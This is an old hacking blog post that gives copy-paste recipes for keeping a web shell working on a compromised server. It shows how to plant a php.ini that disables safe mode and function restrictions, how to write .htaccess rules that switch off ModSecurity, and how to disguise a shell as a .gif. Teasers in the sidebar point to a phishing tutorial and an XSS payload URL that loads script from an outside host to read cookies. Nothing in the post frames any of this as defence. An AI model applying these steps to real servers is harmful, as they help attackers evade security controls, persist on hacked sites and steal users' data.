Bypassing Shell Security

Home / Hacking, News, Security / Bypassing Shell Security

October 28, 2008 PlanetCreator 0 Comments 0 tags

Safemode = On (Secure)
Disables Functions =
dl, passthru, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid
================

Create A File “Php.ini” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
———————
Paste This
———————
safe_mode = OFF
disable_functions = NONE
———————

================
ModSecurity = On
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
————————
Paste This
————————
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
————————

================
Hiding Your Shell
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
But Change File Extension To .gif (You Can Use Any Other extension But Change .gif In .htaccess To Extension You Chose) Then Open Your Shell From There
————————
Paste This
————————
AddType application/x-httpd-php .gif
————————

================
Activate Perl And CGI
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
————————
Paste This
————————
Options ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
————————

Explore More

phishing tutorial

1.You can use this same tut for anything else… 2. Go to http://www.rapidshare.com and navigate to the premium account log-in screen at the url : https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi 3. We will now

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :Â Â Â Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

Burmese Hackers Hacked Georgia Governmentâ€™s Web www.moh.gov.ge

Burmese Hackers Group! Named (â€œBurmeseHackersâ€ or â€œUnderGround Hackers Group @ ughackersgroup{at}gmail.comâ€), Hacked Georgia Gorvernmentâ€™s WebÂ www.moh.gov.ge , Really rare event, cos iâ€™ve never heard about this hackers group before! They

[webapps] SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
on November 15, 2024 at 12:00 am
SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
[webapps] reNgine 2.2.0 - Command Injection (Authenticated)
on October 1, 2024 at 12:00 am
reNgine 2.2.0 - Command Injection (Authenticated)
[webapps] dizqueTV 1.5.3 - Remote Code Execution (RCE)
on October 1, 2024 at 12:00 am
dizqueTV 1.5.3 - Remote Code Execution (RCE)
[webapps] openSIS 9.1 - SQLi (Authenticated)
on October 1, 2024 at 12:00 am
openSIS 9.1 - SQLi (Authenticated)
[dos] Windows TCP/IP - RCE Checker and Denial of Service
on August 28, 2024 at 12:00 am
Windows TCP/IP - RCE Checker and Denial of Service